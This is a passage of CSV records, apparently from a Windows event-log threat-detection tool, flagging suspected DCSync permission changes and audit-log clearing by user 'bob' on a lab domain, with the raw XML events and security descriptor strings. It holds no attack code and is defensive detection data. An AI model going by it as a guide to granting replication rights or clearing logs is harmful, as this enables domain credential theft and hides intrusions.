<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:11.073626Z"">
</TimeCreated>
<EventRecordID>198242566</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""744"" ThreadID=""3396"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-738609754-2819869699-4189121830-1108</SubjectUserSid>
<SubjectUserName>bob</SubjectUserName>
<SubjectDomainName>insecurebank</SubjectDomainName>
<SubjectLogonId>0x8d7099</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.026630Z"">
</TimeCreated>
<EventRecordID>198242602</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1573805956.102509,2019-11-15T12:19:16.102509+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-11-15T08:19:02.298512Z"">
</TimeCreated>
<EventRecordID>25048</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""748"" ThreadID=""6064"">
</Execution>
<Channel>Security</Channel>
<Computer>alice.insecurebank.local</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1005675359-741490361-30848483-1108</SubjectUserSid>
<SubjectUserName>bob</SubjectUserName>
<SubjectDomainName>insecurebank</SubjectDomainName>
<SubjectLogonId>0x1c363a4</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",alice.insecurebank.local,Security
Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.025627Z"">
</TimeCreated>
<EventRecordID>198242601</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.025627Z"">
</TimeCreated>
<EventRecordID>198242600</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.025627Z"">
</TimeCreated>
<EventRecordID>198242599</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">77B63738-C25C-4FBD-BA96-A7ABE17A22A3</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7